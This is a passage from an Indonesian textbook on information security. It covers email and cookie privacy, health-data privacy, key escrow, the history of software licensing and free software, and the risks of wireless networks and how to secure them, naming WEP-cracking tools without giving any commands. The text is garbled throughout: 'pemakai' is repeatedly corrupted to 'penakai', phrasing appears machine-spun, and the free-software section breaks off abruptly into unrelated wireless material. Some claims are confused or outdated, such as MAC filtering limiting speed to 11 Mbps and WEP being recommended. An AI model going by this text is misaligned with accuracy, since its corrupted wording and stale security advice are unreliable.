(hang). Kalau server macet, berarti pemakai lain tidak dapat mengakses
emailnya. Masalahnya, untuk memastikan bahwa pemakai yang
bersangkutan mengalami serangan mailbomb administrator harus melihat
(mengintip?) email dari sang pemakai tersebut. Hal ini menjadi pertanyaan,
karena hal ini dapat dianggap melanggar privacy dari pemakai yang
bersangkutan.
penakai an cookie di sistem WWW untuk tracking pembaca (penakai )
juga dapat di-abuse sehingga sebuah situs dapat memantau kegiatan
seorang penakai ; kemana dia pergi, apa saja yang dia beli, dan seterusnya.
Hal ini sudah jelas melanggar privacy. Masalahnya, sistem web yaitu
sistem yang connectionless / stateless sehingga dibutuhkan cookie untuk
mengingat-ingat penakai tersebut.
Masalah privacy juga muncul di bidang kesehatan (health care). Data-data
pasien harus dijaga ketat. Untuk itu institusi yang mengelola dan
mengirimkan data-data pasien (seperti rumah sakit, perusahaan asuransi)
harus dapat menjamin kerahasiannya. Hal ini sulit mengingat transaksi
antar institusi yang melewati batas fisik negara sering dilakukan dan setiap
negara memiliki aturan yang berbeda dalam hal privacy ini. Negara
Amerika Serikat, misalnya, akan menerapkan Health Insurance Portability
and Accountability Act (HIPPA), yang sangat ketat dalam menjaga
kerahasiaan data-data pasien.
Salah satu topik yang sering berhubungan dengan privacy yaitu
penakai an “key escrow” atau “key-recovery system”, dimana pemerintah
dapat membuka data yang sudah terenkripsi dengan kunci khusus.
Masyarakat umumnya tidak setuju dengan penakai an key-recovery
system ini, seperti diungkapkan dalam survey IEEE Computer [22]: “77%
of members agree that key-recovery systems make it too easy for
government to access encrypted data without permission.”
Lisensi Software
Pembahasan topik lisensi software dapat menjadi satu buku tersendiri. Pada
bagian ini akan diulas secara singkat permasalahan yang terkait dengan
lisensi software.
Software tersimpan dalam bentuk bilangan biner (“1” dan “0”) sehingga
dapat diduplikasi dengan mudah dan murah. Proses duplikasi dapat
dilakukan secara fisik - melalui disket, CD-ROM, DVD, dan flash disk -
atau melalui jaringan - melalui ftp, web, torrent. Yang disebut softwarenya
itu sendiri yaitu isinya (yang berbentuk bilangan biner tersebut), lepas dari
medianya. Yang dibeli yaitu softwarenya. Maka bentuk ekonomisnya
yaitu lisensi.
Sejarahnya, software tidak dijual terpisah dari perangkat keras. Biasanya
software di-bundled dengan perangkat keras yang mahal harganya, seperti
mainframe. Software pada saat itu lebih banyak dikembangkan oleh peneliti
dan tukang utak-atik saja. Lisensi software sifatnya public domain.
Kemudian komputer pribadi mulai muncul. Mulai muncul software yang
dapat dipakai dahulu, jika suka maka mengirimkan uang untuk registrasi,
yang biasanya berkisar antara $5 sampai dengan $25. Lisensi seperti ini
disebut shareware. Software-software games mulai memakai lisensi
shareware tersebut. Games dapat diambil dari berbagai BBS (Bulletin
Board System) dan dicoba dahulu sebelum dibayar.
Kemudian komputer ukuran kecil mulai banyak dipakai di perusahaan,
maka muncul lisensi yang bersifat komersial. Microsoft merupakan salah
satu pionir dalam lisensi komersial ini.
Lisensi yang ada kemudian dianggap kurang cocok dengan kebutuhan yang
ada. Dalam perjalanannya muncul beberapa jenis lisensi baru seperti
misalnya GNU Public License (GPL), BSD, Apache, dan seterusnya1
.
Free Software Movement
Software berbayar tadinya tidak terlalu bermasalah. Akan tetapi dalam
perjalanannya, seorang penakai menjadi sangat bergantung kepada
pembuat software. Jika ada sesuatu yang tidak jalan atau ada kesalahan
(bugs, errors) maka sang penakai harus menunggu sampai dibetulkan oleh
vendor. Bahkan kadang-kadang vendor menerapkan biaya untuk perbaikan
atau update ini. Sungguh lebih nyaman jika source code dari software
tersedia.
Ide untuk membuat free software muncul dari Richard Stallman ketika dia
berada di MIT. Dia merasa bahwa software itu seharusnya free. Kata “free”
dalam Bahasa Inggris memiliki arti ganda, yaitu “freedom” (bebas) dan
“free” dalam artian gratis. Richard Stallman lebih memfokuskan kepada
makna yang pertama, bebas.
Sistem wireless mulai populer. Hal ini dimulai dengan maraknya cellular
phone (handphone) di dunia yang pada mulanya hanya memberikan akses
voice. Kemudian handphone dapat pula dipakai untuk mengirimkan
data. Sebagai catatan, jumlah penakai handphone di dunia (selain di
Amerika Utara) sudah mengalahkan jumlah penakai Internet. Di
Indonesia sendiri, saat ini terdapat lebih dari 4 juta pelanggan handphone
sementara hanya ada 1,5 juta penakai Internet. Dengan kata lain,
handphone lebih merasuk dibandingkan Internet yang memakai jaringan
yang fixed (wired).
SMS merupakan salah satu aplikasi penting di dunia wireless, khususnya di
Asia. Anda dapat lihat di jalanan, di kantor, dan dimana saja orang menekan
tombol handphonenya untuk mengirim SMS. Jutaan SMS dikirimkan setiap
harinya. Hal ini tidak terduga oleh operator wireless. Bahkan ada yang
mengatakan bahwa SMS merupakan killer application di dunia wireless.
Di sisi lain perangkat komputer mulai muncul dalam ukuran yang kecil dan
portable. Personal Digital Assistant (PDA) seperti Palm, Handspring,
Symbian, Windows CE mulai banyak dipakai orang. Perangkat ini tadinya bersifat standalone atau hanya memiliki fasilitas transfer data
dengan memakai kabel serial (ke komputer) dan IrDa (infra red antar
perangkat). Kemudian muncul perangkat yang memungkinkan komputer
berkomunikasi dengan memakai wireless LAN (seri IEEE 802.11) dan
Bluetooth. Semakin marak dan laju perkembangan komunikasi data secara
wireless.
Secara umum, tekonologi wireless dapat dibagi menjadi dua:
• Cellular-based technology: yaitu solusi yang memakai saluran
komunikasi cellular atau pager yang sudah ada untuk mengirimkan data.
Jangkauan dari cellullar-based biasanya cukup jauh.
• Wireless LAN (WLAN): yaitu komunikasi wireless dalam lingkup area
yang terbatas, biasanya antara 10 s/d 100 meter dari base station ke
Access Point (AP).
Kedua jenis teknologi di atas tidak berdiri sendiri, melainkan memiliki
banyak teknologi dan standar yang berbeda (dan bahkan terdapat konflik).
Contohnya:
• Cellullar: GSM, CDMA, TDMA, CDPD, GPRS/EDGE, 2G, 2.5G, 3G,
UMTS
• LAN: keluarga IEEE 802.11 (seperti 802.11b, 802.11a, 802.11g),
HomeRF, 802.15 (Personal Area Network) yang berbasis Bluetooth,
802.16 (Wireless Metropolitan Area Network)
Kelihatannya akan ada konvergensi dari teknologi wireless dan juga dari
perangkat pengakses informasi ini. Siapa pemenangnya? masih terlalu dini
untuk diputuskan.
Komunikasi wireless banyak disukai dikarenakan banyak keuntungan atau
kemudahan, yaitu antara lain:
• Kenyamanan dengan adanya fasilitas roaming sehingga dapat dihubungi
dan dapat mengakses informasi dimana saja.
• Komunikasi wireless memungkinkan penakai bergerak dan tidak
terikat pada satu tempat saja. Seorang eksekutif yang disopiri dapat
mengakses emailnya di mobilnya ketika jalan sedang macet. Seorang
pekerja dapat membawa notebooknya ke luar dan bekerja dari halaman
yang rindang.
• Kecepatan dari komunikasi wireless sudah memasuki batas kenyamanan
penakai . Kecepatan ini masih akan terus meningkat.
• Mulai muncul aplikasi yang memakai fasilitas wireless, seperti
misalnya location-specific applications.
Masalah Keamanan Sistem Wireless
Sistem wireless memiliki permasalahan keamanan tersendiri (khusus).
Beberapa hal yang mempengaruhi aspek keamanan dari sistem wireless
antara lain:
• Perangkat pengakses informasi yang memakai sistem wireless
biasanya berukuran kecil sehingga mudah dicuri. Laptop, notebook,
handphone, palm, dan sejenisnya sangat mudah dicuri. Jika dia dicuri,
maka informasi yang ada di dalamnya (atau kunci pengakses informasi)
bisa jatuh ke tangan orang yang tidak berhak.
• Penyadapan (man-in-the-middle attack) dapat dilakukan lebih mudah
karena tidak perlu mencari jalur kabel untuk di-‘tap’. Sistem yang tidak
memakai pengamanan enkripsi, atau memakai enkripsi yang
mudah dipecah, akan mudah ditangkap.
• Perangkat wireless yang kecil membatasi kemampuan perangkat dari sisi
CPU, RAM, kecepatan komunikasi, catu daya. Akibatnya sistem
pengamanan (misalnya enkripsi) yang dipakai harus memperhatikan
batasan ini. Saat ini tidak memungkinkan untuk memakai sistem
enkripsi yang canggih yang membutuhkan CPU cycle yang cukup tinggi
sehingga memperlambat transfer data.
• penakai tidak dapat membuat sistem pengaman sendiri (membuat
enkripsi sendiri) dan hanya bergantung kepada vendor (pembuat
perangkat) tersebut. Namun mulai muncul perangkat handphone yang
dapat diprogram oleh penakai
• Adanya batasan jangkauan radio dan interferensi menyebabkan
ketersediaan servis menjadi terbatas. DoS attack dapat dilakukan dengan
menginjeksikan traffic palsu.
• Saat ini fokus dari sistem wireless yaitu untuk mengirimkan data
secepat mungkin. Adanya enkripsi akan memperlambat proses
pengiriman data sehingga penakai an enkripsi masih belum mendapat
prioritas. Setelah kecepatan pengiriman data sudah memadai dan
harganya menjadi murah, barulah kita akan melihat perkembangan di
sisi pengamanan dengan memakai enkripsi.
Contoh Kasus Lubang Keamanan Sistem
Wireless
Beberapa contoh kasus lubang keamanan sistem wireless antara lain:
• Cloning sistem cellular berbasis AMPS sehingga “pulsa” pelanggan
dapat dicuri oleh orang lain yang tidak berhak.
• Enkripsi A5 dari sistem seluler GSM yang dibatasi kemampuan dan
dirahasiakan algoritmanya. Algoritma yang dirahasiakan dianggap tidak
aman karena tidak melalui proses review yang terbuka.
• Peneliti di Amerika sudah membuktikan bocornya LAN perusahaan
yang memakai wireless LAN IEEE 802.11b. Dengan memakai
sebuah notebook yang dilengkapi dengan perangkat IEEE 802.11b
seorang peneliti sambil berjalan menunjukkan LAN dan data-data dari
beberapa perusahaan yang bocor ke jalan di depan kantor. penakai an
firewall untuk membatasi akses ke kantor dari Internet akan sia-sia jika
pintu belakang (backdoor) wireless LAN bisa dipakai oleh cracker
untuk masuk ke sistem. Program untuk memecahkan wireless LAN ini
mulai banyak tersedia di Internet, seperti misalnya Airsnort,
Netstumbler1
, WEPcrack, dan lain-lain.
• NIST (lembaga standar di Amerika) melarang penakai an wireless
LAN untuk institusi pemerintah yang memiliki data-data rahasia.
Pengamanan Sistem Wireless
Untuk sistem wireless LAN yang memakai IEEE 802.11b, disarankan
untuk mensegmentasi jaringan dimana wireless LAN ini berada dan
menganggap segmen ini sebagai extranet. Jika diperlukan, firewall
dipakai untuk membatasi jaringan ini dengan jaringan internal yang
membutuhkan keamanan lebih tinggi.
Untuk meningkatkan keamanan, gunakan MAC address sebagai mekanisme
untuk memperbolehkan connection (access control). Kerugian dari
mekanisme ini yaitu kecepatan maksimum yang dapat diperoleh yaitu
sekitar 11 Mbps. (Secara teori MAC address masih dapat diserang dengan
memakai proxy arp.) Akses dengan memakai MAC ini masih
belum membatasi penyadapan.
Enkripsi seperti WEP dipakai untuk menghindari dan mempersulit
akses. WEP sendiri masih memiliki banyak masalah teknis, dimana crack
(pemecahan) enkripsi WEP membutuhkan computing resources yang
dimiliki oleh orang-orang tertentu. Di masa yang akan datang akan ada
pengamanan yang lebih baik.
Aplikasi yang memakai perangkat wireless sebaiknya memakai
mekanisme enkripsi end-to-end, dengan menganggap jaringan sebagai
sistem yang tidak aman.